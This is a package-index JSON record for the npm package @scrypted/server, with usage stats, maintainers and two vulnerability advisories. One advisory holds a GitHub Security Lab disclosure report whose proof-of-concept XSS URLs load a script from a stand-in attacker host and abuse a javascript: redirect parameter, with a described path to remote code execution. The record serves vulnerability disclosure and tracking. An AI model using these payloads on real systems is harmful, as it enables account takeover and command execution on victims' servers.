{"id":1168651,"name":"@scrypted/server","ecosystem":"npm","description":null,"homepage":null,"licenses":"ISC","normalized_licenses":["ISC"],"repository_url":"","keywords_array":[],"namespace":"scrypted","versions_count":722,"first_release_published_at":"2021-10-20T21:35:58.852Z","latest_release_published_at":"2025-11-07T17:15:55.569Z","latest_release_number":"0.144.1","last_synced_at":"2026-04-20T22:13:11.250Z","created_at":"2022-04-08T12:43:04.734Z","updated_at":"2026-04-20T22:13:11.250Z","registry_url":"https://www.npmjs.com/package/@scrypted/server","install_command":"npm install @scrypted/server","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.143.0","beta":"0.144.1"}},"repo_metadata":null,"repo_metadata_updated_at":null,"dependent_packages_count":3,"downloads":2763,"downloads_period":"last-month","dependent_repos_count":4,"rankings":{"downloads":2.739939036176138,"dependent_repos_count":5.846976104460718,"dependent_packages_count":5.822627763551773,"stargazers_count":null,"forks_count":null,"docker_downloads_count":1.203032680945347,"average":3.903143896283494},"purl":"pkg:npm/%40scrypted/server","advisories":[{"uuid":"GSA_kwCzR0hTQS14bWhoLXhyY2MtbXgzNs4AA-Yp","url":"https://github.com/advisories/GHSA-xmhh-xrcc-mx36","title":"Scrypted Cross-site Scripting vulnerability","description":"Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the `owner' and 'pkg` parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-08-05T21:29:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-47620","https://github.com/koush/scrypted/blob/71cbe83a2a20f743342df695ca7b98482b73e60f/server/src/plugin/plugin-http.ts#L45","https://securitylab.github.com/advisories/GHSL-2023-218_GHSL-2023-219_scrypted","https://github.com/advisories/GHSA-xmhh-xrcc-mx36"],"source_kind":"github","identifiers":["GHSA-xmhh-xrcc-mx36","CVE-2023-47620"],"repository_url":"https://github.com/koush/scrypted","blast_radius":3.1909179540382007,"created_at":"2024-08-05T22:05:31.197Z","updated_at":"2026-04-05T20:04:39.308Z","epss_percentage":0.00219,"epss_percentile":0.44557,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14bWhoLXhyY2MtbXgzNs4AA-Yp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14bWhoLXhyY2MtbXgzNs4AA-Yp","packages":[{"ecosystem":"npm","package_name":"@scrypted/server","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.55.0"}],"purl":"pkg:npm/%40scrypted%2Fserver"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14bWhoLXhyY2MtbXgzNs4AA-Yp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13NGh2LXZtdjktaGdjcs4AA5Vm","url":"https://github.com/advisories/GHSA-w4hv-vmv9-hgcr","title":"GitHub Security Lab (GHSL) Vulnerability Report, scrypted: `GHSL-2023-218`, `GHSL-2023-219`","description":"# GitHub Security Lab (GHSL) Vulnerability Report, scrypted: `GHSL-2023-218`, `GHSL-2023-219`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [scrypted](https://github.com/koush/scrypted).\n\nWe are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-218` or `GHSL-2023-219` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nTwo refelcted Cross-Site Scripting (XSS) vulnerabilities exist in scrypted that may allow an attacker to impersonate any user who clicks on specially crafted links. In the worst case, an attacker may be able to impersonate an administrator and run arbitrary commands.\n\n## Project\n\nscrypted\n\n## Tested Version\n\n[v55.0](https://github.com/koush/scrypted/releases/tag/v0.55.0)\n\n## Details\n\n### Issue 1: reflected XSS in [`plugin-http.ts`](https://github.com/koush/scrypted/blob/71cbe83a2a20f743342df695ca7b98482b73e60f/server/src/plugin/plugin-http.ts#L45) (`GHSL-2023-218`)\n\nThe `owner` and `pkg` parameters are reflected back in the response when the endpoint is not found, allowing for a reflected XSS vulnerability.\n\n```javascript\nconst { owner, pkg } = req.params;\n        let endpoint = pkg;\n        if (owner)\n            endpoint = `@${owner}/${endpoint}`;\n        const pluginData = await this.getEndpointPluginData(req, endpoint, isUpgrade, isEngineIOEndpoint);\n\n        if (!pluginData) {\n            end(404, `Not Found (plugin or device \"${endpoint}\" not found)`);\n            return;\n        }\n\n\n```\n\n#### Impact\n\nThis issue may lead to `Remote Code Execution`.\n\n#### Remediation\n\nIn order to remediate, ensure that parameters are not reflected back in the response. In addition, on error responses where html is unnecessary, set the `text/plain` Content-Type to prevent XSS (express defaults to text/html).\n\n#### Resources\n\nProof of Concept:\n\nThe following url will create a script tag in the current document which will load `attacker.domain/rce.js`. This JavaScript file can then be used to communicate with the server over HTTP via RPC, and send some requests to get the `nativeId` and `proxyID` for the `automation:update-plugins` and achieve the ability to run shell commands at a specified time.\n\nhttps://localhost:10443/endpoint/%3Cimg%20src%20onerror=a=document.createElement('script');a.setAttribute('src',document.location.hash.substr(1));document.head.appendChild(a)%3E/pkg#//attacker.domain/rce.js\n\nIn the browser, you should see the script element be created with the src as `https://attacker.domain/rce.js`.\n\n### Issue 2: reflected XSS in [`plugins/core/ui/src/Login.vue`](https://github.com/koush/scrypted/blob/v0.55.0/plugins/core/ui/src/Login.vue#L79) (`GHSL-2023-219`)\n\nA reflected XSS vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login.\n\n```javascript\n  try {\n          const redirect_uri = new URL(window.location).searchParams.get('redirect_uri');\n          if (redirect_uri) {\n            window.location = redirect_uri;\n            return;\n          }\n\n        }\n```\n\n#### Impact\n\nThis issue may lead to `Remote Code Execution`.\n\n#### Remediation\n\nIn order to remediate, ensure user-controlled data is not placed into the DOM. Additionally, this is also an open redirect vulnerability because the url is not validated and a user may be redirected to an attacker controlled website after logging in, not knowing they have left the actual real  website. If this redirect_uri parameter is supposed to only redirect to the current website/domain, please incorporate a check that it is only redirecting to the current domain.\n\n#### Resources\nProof of Concept:\n\nWhen the user is not logged in, send a link to the server with the parameter:\n\n `redirect_uri=javascript:var script = document.createElement('script');script.src = 'https://attacker.domain'; document.head.appendChild(script);`\n\nat the end of the uri (but before the #).\n\n\nExample: `https://localhost:10443/endpoint/test/test?redirect_uri=javascript:var%20script%20=%20document.createElement('script');script.src%20=%20'https://attacker.domain';%20document.head.appendChild(script);#//`\n\n\nSimilar to Proof of Concept 1 this will load a JavaScript file which can make authenticated requests to the server, possibly leading to RCE.\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThese issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).\nThis vulnerability was found with the help of [CodeQL Reflected XSS query](https://codeql.github.com/codeql-query-help/javascript/js-reflected-xss/).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-218` or `GHSL-2023-219` in any communication regarding these issues.\n\n## Disclosure Policy\n\nThis report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-02-16T19:29:31.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H","references":["https://github.com/koush/scrypted/security/advisories/GHSA-w4hv-vmv9-hgcr","https://nvd.nist.gov/vuln/detail/CVE-2023-47620","https://nvd.nist.gov/vuln/detail/CVE-2023-47623","https://github.com/koush/scrypted/blob/71cbe83a2a20f743342df695ca7b98482b73e60f/server/package.json","https://github.com/koush/scrypted/blob/71cbe83a2a20f743342df695ca7b98482b73e60f/server/src/plugin/plugin-http.ts#L45","https://github.com/koush/scrypted/blob/v0.55.0/plugins/core/package.json","https://github.com/koush/scrypted/blob/v0.55.0/plugins/core/ui/src/Login.vue#L79","https://github.com/koush/scrypted/releases/tag/v0.55.0","https://github.com/advisories/GHSA-w4hv-vmv9-hgcr"],"source_kind":"github","identifiers":["GHSA-w4hv-vmv9-hgcr"],"repository_url":"https://github.com/koush/scrypted","blast_radius":0.0,"created_at":"2024-02-16T20:04:35.848Z","updated_at":"2026-04-20T03:05:21.045Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13NGh2LXZtdjktaGdjcs4AA5Vm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13NGh2LXZtdjktaGdjcs4AA5Vm","packages":[{"ecosystem":"npm","package_name":"@scrypted/core","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.1.142"}],"purl":"pkg:npm/%40scrypted%2Fcore","statistics":{"dependent_packages_count":2,"dependent_repos_count":1,"downloads":58000,"downloads_period":"last-month"},"affected_versions":["0.0.5","0.0.7","0.0.8","0.0.9","0.0.10","0.0.12","0.0.13","0.0.14","0.0.15","0.0.17","0.0.18","0.0.20","0.0.21","0.0.23","0.0.24","0.0.25","0.0.26","0.0.27","0.0.28","0.0.29","0.0.30","0.0.31","0.0.33","0.0.34","0.0.35","0.0.36","0.0.37","0.0.38","0.0.39","0.0.40","0.0.41","0.0.42","0.0.43","0.0.44","0.0.45","0.0.46","0.0.47","0.0.48","0.0.49","0.0.50","0.0.51","0.0.52","0.0.53","0.0.55","0.0.56","0.0.57","0.0.58","0.0.59","0.0.60","0.0.61","0.0.62","0.0.63","0.0.64","0.0.65","0.0.66","0.0.67","0.0.68","0.0.69","0.0.70","0.0.71","0.0.72","0.0.74","0.0.75","0.0.76","0.0.77","0.0.78","0.0.79","0.0.80","0.0.81","0.0.82","0.0.83","0.0.84","0.0.85","0.0.86","0.0.87","0.0.88","0.0.89","0.0.90","0.0.91","0.0.92","0.0.93","0.0.94","0.0.95","0.0.96","0.0.97","0.0.98","0.0.99","0.0.100","0.0.101","0.0.102","0.0.103","0.0.104","0.0.105","0.0.106","0.0.107","0.0.108","0.0.109","0.0.110","0.0.111","0.0.112","0.0.113","0.0.114","0.0.115","0.0.116","0.0.117","0.0.118","0.0.119","0.0.120","0.0.121","0.0.122","0.0.123","0.0.124","0.0.125","0.0.126","0.0.127","0.0.128","0.0.129","0.0.130","0.0.132","0.0.133","0.0.134","0.0.135","0.0.136","0.0.137","0.0.138","0.0.139","0.0.140","0.0.142","0.0.143","0.0.145","0.0.146","0.0.148","0.0.150","0.0.151","0.0.152","0.0.153","0.0.154","0.0.155","0.0.156","0.0.157","0.0.158","0.0.159","0.0.160","0.0.161","0.0.162","0.0.163","0.0.164","0.0.165","0.0.166","0.0.167","0.0.168","0.0.169","0.0.170","0.0.171","0.0.172","0.0.173","0.0.174","0.0.175","0.0.176","0.0.177","0.0.178","0.0.179","0.0.181","0.0.182","0.0.183","0.0.184","0.0.185","0.0.186","0.0.189","0.0.190","0.0.192","0.0.193","0.0.194","0.0.195","0.0.196","0.0.197","0.0.198","0.0.199","0.0.200","0.0.201","0.0.202","0.0.203","0.0.204","0.0.205","0.0.206","0.0.207","0.0.208","0.0.209","0.0.210","0.0.212","0.0.213","0.0.215","0.0.216","0.0.217","0.0.218","0.0.220","0.0.221","0.0.222","0.0.223","0.0.224","0.0.225","0.0.226","0.0.227","0.0.228","0.0.229","0.0.230","0.0.231","0.0.232","0.0.233","0.0.234","0.0.235","0.0.236","0.0.237","0.0.238","0.0.239","0.0.241","0.0.242","0.0.243","0.0.244","0.0.245","0.0.246","0.0.247","0.0.248","0.0.249","0.0.250","0.0.251","0.0.252","0.0.253","0.0.254","0.0.255","0.0.256","0.0.257","0.0.258","0.0.259","0.0.260","0.0.261","0.0.262","0.0.263","0.1.1","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","0.1.10","0.1.11","0.1.12","0.1.13","0.1.14","0.1.15","0.1.16","0.1.17","0.1.18","0.1.19","0.1.20","0.1.21","0.1.22","0.1.23","0.1.24","0.1.25","0.1.26","0.1.27","0.1.28","0.1.30","0.1.31","0.1.32","0.1.33","0.1.34","0.1.35","0.1.36","0.1.37","0.1.38","0.1.39","0.1.40","0.1.41","0.1.42","0.1.44","0.1.45","0.1.46","0.1.47","0.1.48","0.1.49","0.1.50","0.1.51","0.1.52","0.1.53","0.1.54","0.1.55","0.1.56","0.1.57","0.1.58","0.1.60","0.1.61","0.1.62","0.1.63","0.1.64","0.1.65","0.1.66","0.1.67","0.1.68","0.1.69","0.1.70","0.1.71","0.1.72","0.1.73","0.1.74","0.1.75","0.1.77","0.1.78","0.1.79","0.1.80","0.1.81","0.1.82","0.1.83","0.1.84","0.1.85","0.1.86","0.1.87","0.1.88","0.1.89","0.1.90","0.1.91","0.1.92","0.1.93","0.1.94","0.1.95","0.1.96","0.1.99","0.1.100","0.1.101","0.1.102","0.1.103","0.1.104","0.1.105","0.1.106","0.1.107","0.1.108","0.1.109","0.1.110","0.1.111","0.1.112","0.1.113","0.1.114","0.1.115","0.1.116","0.1.117","0.1.118","0.1.119","0.1.120","0.1.121","0.1.122","0.1.123","0.1.124","0.1.125","0.1.126","0.1.127","0.1.128","0.1.129","0.1.130","0.1.131","0.1.132","0.1.133","0.1.134","0.1.135","0.1.136","0.1.137","0.1.138","0.1.139","0.1.140","0.1.141","0.1.142"],"unaffected_versions":["0.1.143","0.1.144","0.1.145","0.1.146","0.1.147","0.1.148","0.1.149","0.1.150","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.3.8","0.3.9","0.3.11","0.3.12","0.3.13","0.3.14","0.3.15","0.3.16","0.3.17","0.3.18","0.3.19","0.3.20","0.3.21","0.3.22","0.3.23","0.3.24","0.3.25","0.3.26","0.3.27","0.3.28","0.3.29","0.3.30","0.3.31","0.3.32","0.3.33","0.3.34","0.3.35","0.3.36","0.3.37","0.3.38","0.3.39","0.3.40","0.3.41","0.3.42","0.3.43","0.3.44","0.3.45","0.3.46","0.3.47","0.3.48","0.3.49","0.3.50","0.3.51","0.3.52","0.3.53","0.3.54","0.3.55","0.3.56","0.3.57","0.3.58","0.3.59","0.3.60","0.3.61","0.3.62","0.3.63","0.3.64","0.3.65","0.3.66","0.3.67","0.3.68","0.3.69","0.3.70","0.3.71","0.3.72","0.3.73","0.3.74","0.3.75","0.3.76","0.3.77","0.3.78","0.3.80","0.3.81","0.3.82","0.3.83","0.3.84","0.3.85","0.3.86","0.3.87","0.3.88","0.3.89","0.3.90","0.3.91","0.3.92","0.3.93","0.3.94","0.3.95","0.3.96","0.3.97","0.3.98","0.3.99","0.3.100","0.3.101","0.3.102","0.3.103","0.3.104","0.3.105","0.3.106","0.3.107","0.3.108","0.3.109","0.3.110","0.3.111","0.3.112","0.3.113","0.3.114","0.3.115","0.3.116","0.3.117","0.3.118","0.3.119","0.3.120","0.3.121","0.3.122","0.3.123","0.3.124","0.3.125","0.3.126","0.3.127","0.3.128","0.3.129","0.3.130","0.3.132","0.3.133","0.3.134","0.3.135","0.3.136","0.3.137","0.3.138","0.3.139","0.3.140","0.3.141","0.3.142","0.3.143","0.3.144","0.3.145","0.3.146","0.3.147"]},{"ecosystem":"npm","package_name":"@scrypted/server","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.56.0"}],"purl":"pkg:npm/%40scrypted%2Fserver","statistics":{"dependent_packages_count":3,"dependent_repos_count":4,"downloads":2766,"downloads_period":"last-month"},"affected_versions":["0.0.2","0.0.3","0.0.4","0.0.5","0.0.6","0.0.7","0.0.8","0.0.9","0.0.10","0.0.11","0.0.12","0.0.13","0.0.14","0.0.15","0.0.16","0.0.17","0.0.18","0.0.19","0.0.20","0.0.21","0.0.22","0.0.23","0.0.24","0.0.25","0.0.26","0.0.27","0.0.28","0.0.29","0.0.30","0.0.31","0.0.32","0.0.33","0.0.34","0.0.35","0.0.36","0.0.37","0.0.38","0.0.39","0.0.40","0.0.41","0.0.42","0.0.43","0.0.44","0.0.45","0.0.46","0.0.47","0.0.48","0.0.49","0.0.50","0.0.51","0.0.52","0.0.53","0.0.54","0.0.55","0.0.56","0.0.57","0.0.58","0.0.59","0.0.60","0.0.61","0.0.62","0.0.63","0.0.64","0.0.65","0.0.66","0.0.67","0.0.68","0.0.69","0.0.70","0.0.71","0.0.74","0.0.75","0.0.77","0.0.78","0.0.79","0.0.80","0.0.81","0.0.82","0.0.83","0.0.84","0.0.85","0.0.86","0.0.87","0.0.88","0.0.89","0.0.90","0.0.91","0.0.92","0.0.93","0.0.94","0.0.95","0.0.96","0.0.97","0.0.98","0.0.99","0.0.100","0.0.101","0.0.102","0.0.103","0.0.104","0.0.105","0.0.106","0.0.107","0.0.108","0.0.109","0.0.110","0.0.111","0.0.112","0.0.113","0.0.114","0.0.115","0.0.116","0.0.118","0.0.119","0.0.120","0.0.121","0.0.122","0.0.123","0.0.124","0.0.125","0.0.126","0.0.127","0.0.128","0.0.129","0.0.130","0.0.131","0.0.132","0.0.133","0.0.134","0.0.135","0.0.137","0.0.138","0.0.139","0.0.140","0.0.141","0.0.142","0.0.143","0.0.144","0.0.145","0.0.146","0.0.147","0.0.148","0.0.149","0.0.150","0.0.151","0.0.152","0.0.153","0.0.154","0.0.155","0.0.156","0.0.157","0.0.158","0.0.159","0.0.160","0.0.161","0.0.162","0.0.163","0.0.164","0.0.165","0.0.166","0.0.167","0.0.168","0.0.169","0.0.170","0.0.171","0.0.172","0.0.173","0.0.174","0.0.175","0.0.176","0.0.177","0.0.178","0.0.179","0.0.180","0.0.181","0.0.182","0.0.183","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","0.1.10","0.1.11","0.1.12","0.1.13","0.1.14","0.1.15","0.1.16","0.2.1","0.2.2","0.2.5","0.2.6","0.2.7","0.2.8","0.2.9","0.2.10","0.2.11","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.3.8","0.3.9","0.3.10","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.8","0.4.9","0.4.10","0.4.11","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","0.5.9","0.5.10","0.5.11","0.5.12","0.5.13","0.6.1","0.6.2","0.6.3","0.6.4","0.6.5","0.6.6","0.6.7","0.6.8","0.6.9","0.6.10","0.6.11","0.6.12","0.6.13","0.6.14","0.6.15","0.6.16","0.6.17","0.6.18","0.6.19","0.6.20","0.6.21","0.6.22","0.6.23","0.6.24","0.6.26","0.7.2","0.7.4","0.7.5","0.7.6","0.7.7","0.7.8","0.7.9","0.7.10","0.7.11","0.7.12","0.7.13","0.7.14","0.7.15","0.7.16","0.7.17","0.7.18","0.7.19","0.7.20","0.7.21","0.7.22","0.7.23","0.7.24","0.7.25","0.7.26","0.7.27","0.7.28","0.7.29","0.7.30","0.7.31","0.7.32","0.7.33","0.7.34","0.7.35","0.7.36","0.7.37","0.7.38","0.7.39","0.7.40","0.7.41","0.7.42","0.7.43","0.7.44","0.7.45","0.7.46","0.7.48","0.7.49","0.7.50","0.7.51","0.7.52","0.7.53","0.7.55","0.7.56","0.7.57","0.7.58","0.7.59","0.7.60","0.7.61","0.7.62","0.7.63","0.7.64","0.7.65","0.7.66","0.7.67","0.7.68","0.7.69","0.7.70","0.7.71","0.7.72","0.7.73","0.7.74","0.7.75","0.7.76","0.7.77","0.7.79","0.7.80","0.7.81","0.7.83","0.7.84","0.7.85","0.7.87","0.7.88","0.7.89","0.7.90","0.7.91","0.7.92","0.7.93","0.7.94","0.7.95","0.7.96","0.7.97","0.7.98","0.7.99","0.7.100","0.8.0","0.9.0","0.10.0","0.11.0","0.12.0","0.13.0","0.14.0","0.15.0","0.16.0","0.17.0","0.18.0","0.19.0","0.20.0","0.21.0","0.22.0","0.23.0","0.24.0","0.25.0","0.26.0","0.27.0","0.28.0","0.29.0","0.30.0","0.31.0","0.32.0","0.33.0","0.34.0","0.35.0","0.36.0","0.37.0","0.38.0","0.39.0","0.40.0","0.41.0","0.43.0","0.44.0","0.45.0","0.46.0","0.47.0","0.48.0","0.49.0","0.50.0","0.51.0","0.52.0","0.53.0","0.54.0","0.55.0","0.56.0"],"unaffected_versions":["0.57.0","0.58.0","0.59.0","0.61.0","0.62.0","0.63.1","0.64.0","0.65.0","0.66.0","0.67.0","0.68.0","0.69.0","0.70.0","0.71.0","0.72.0","0.73.0","0.74.0","0.75.0","0.76.0","0.77.0","0.78.0","0.79.0","0.80.0","0.81.0","0.82.0","0.83.0","0.84.0","0.85.0","0.86.0","0.87.0","0.88.0","0.89.0","0.90.0","0.91.0","0.91.1","0.91.2","0.91.3","0.91.4","0.91.5","0.91.6","0.92.0","0.93.0","0.94.1","0.94.2","0.94.3","0.94.4","0.94.5","0.94.6","0.94.7","0.94.8","0.94.9","0.94.10","0.94.11","0.94.12","0.94.13","0.94.14","0.94.15","0.94.16","0.94.17","0.94.18","0.94.19","0.94.20","0.94.21","0.94.22","0.94.23","0.94.24","0.94.25","0.94.26","0.94.27","0.94.28","0.94.29","0.94.30","0.94.31","0.94.32","0.94.33","0.94.34","0.94.35","0.94.36","0.94.37","0.94.38","0.94.39","0.94.40","0.94.41","0.94.42","0.94.43","0.94.44","0.95.0","0.96.0","0.97.0","0.98.0","0.98.1","0.98.2","0.98.3","0.98.4","0.98.5","0.99.0","0.100.0","0.100.1","0.100.2","0.101.4","0.102.0","0.103.0","0.103.1","0.103.2","0.103.3","0.103.4","0.105.0","0.106.0","0.107.0","0.108.0","0.109.0","0.110.0","0.110.1","0.110.2","0.110.3","0.110.4","0.111.0","0.112.0","0.113.0","0.114.0","0.115.0","0.115.1","0.115.2","0.115.3","0.115.4","0.115.5","0.115.6","0.115.7","0.115.8","0.115.9","0.115.10","0.115.11","0.115.12","0.115.13","0.115.14","0.115.15","0.115.16","0.115.17","0.115.18","0.115.19","0.115.20","0.115.21","0.115.22","0.115.23","0.115.24","0.115.25","0.115.26","0.115.27","0.115.28","0.115.29","0.115.30","0.115.31","0.115.32","0.115.33","0.115.34","0.115.35","0.115.36","0.115.37","0.115.38","0.115.39","0.115.40","0.115.41","0.115.42","0.115.43","0.115.44","0.116.0","0.117.0","0.117.1","0.117.2","0.117.3","0.117.4","0.118.0","0.119.0","0.119.1","0.119.2","0.119.3","0.120.0","0.121.0","0.121.3","0.121.4","0.122.0","0.123.0","0.123.1","0.123.2","0.123.3","0.123.4","0.123.5","0.123.6","0.123.7","0.123.8","0.123.9","0.123.10","0.123.15","0.123.16","0.123.17","0.123.18","0.123.19","0.123.20","0.123.21","0.123.22","0.123.23","0.123.24","0.123.25","0.123.26","0.123.27","0.123.28","0.123.29","0.123.30","0.123.31","0.123.32","0.123.33","0.123.34","0.123.35","0.123.36","0.123.37","0.123.38","0.123.39","0.123.40","0.123.41","0.123.42","0.123.43","0.123.44","0.123.45","0.123.46","0.123.47","0.123.48","0.123.49","0.123.50","0.123.51","0.123.52","0.123.53","0.123.54","0.123.55","0.123.56","0.123.57","0.123.58","0.123.59","0.123.60","0.123.61","0.123.62","0.123.63","0.123.64","0.123.65","0.123.66","0.123.67","0.123.68","0.123.69","0.123.70","0.123.71","0.123.72","0.124.0","0.125.0","0.125.1","0.125.2","0.126.0","0.127.0","0.127.1","0.128.0","0.128.1","0.128.2","0.129.0","0.130.0","0.130.1","0.130.2","0.131.0","0.132.0","0.132.1","0.132.2","0.133.0","0.134.0","0.135.0","0.136.0","0.137.0","0.138.0","0.138.1","0.138.2","0.138.3","0.138.4","0.138.5","0.138.6","0.138.7","0.138.8","0.138.9","0.138.10","0.138.11","0.138.12","0.138.13","0.138.14","0.138.15","0.138.16","0.138.17","0.138.18","0.138.19","0.138.20","0.138.21","0.138.22","0.138.23","0.138.24","0.138.25","0.138.26","0.139.0","0.140.0","0.140.1","0.140.2","0.140.3","0.140.4","0.140.5","0.141.0","0.142.0","0.142.1","0.142.2","0.142.3","0.142.4","0.142.5","0.142.6","0.142.7","0.142.8","0.142.9","0.143.0","0.144.0","0.144.1"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13NGh2LXZtdjktaGdjcs4AA5Vm/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@scrypted/server","docker_dependents_count":4,"docker_downloads_count":2854,"usage_url":"https://repos.ecosyste.ms/usage/npm/@scrypted/server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@scrypted/server/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@scrypted%2Fserver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@scrypted%2Fserver/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@scrypted%2Fserver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@scrypted%2Fserver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@scrypted%2Fserver/codemeta","maintainers":[{"uuid":"koush","login":"koush","name":null,"email":"koush@koushikdutta.com","url":null,"packages_count":146,"html_url":"https://www.npmjs.com/~koush","role":null,"created_at":"2022-11-13T04:50:47.544Z","updated_at":"2022-11-13T04:50:47.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/koush/packages"},{"uuid":"billyzoellers","login":"billyzoellers","name":null,"email":"billy.zoellers@mac.com","url":null,"packages_count":117,"html_url":"https://www.npmjs.com/~billyzoellers","role":null,"created_at":"2023-01-30T21:56:51.832Z","updated_at":"2023-01-30T21:56:51.832Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/billyzoellers/packages"},{"uuid":"bjia56","login":"bjia56","name":null,"email":"dev.bjia56@gmail.com","url":null,"packages_count":130,"html_url":"https://www.npmjs.com/~bjia56","role":null,"created_at":"2023-01-30T21:56:51.918Z","updated_at":"2023-01-30T21:56:51.918Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bjia56/packages"}]}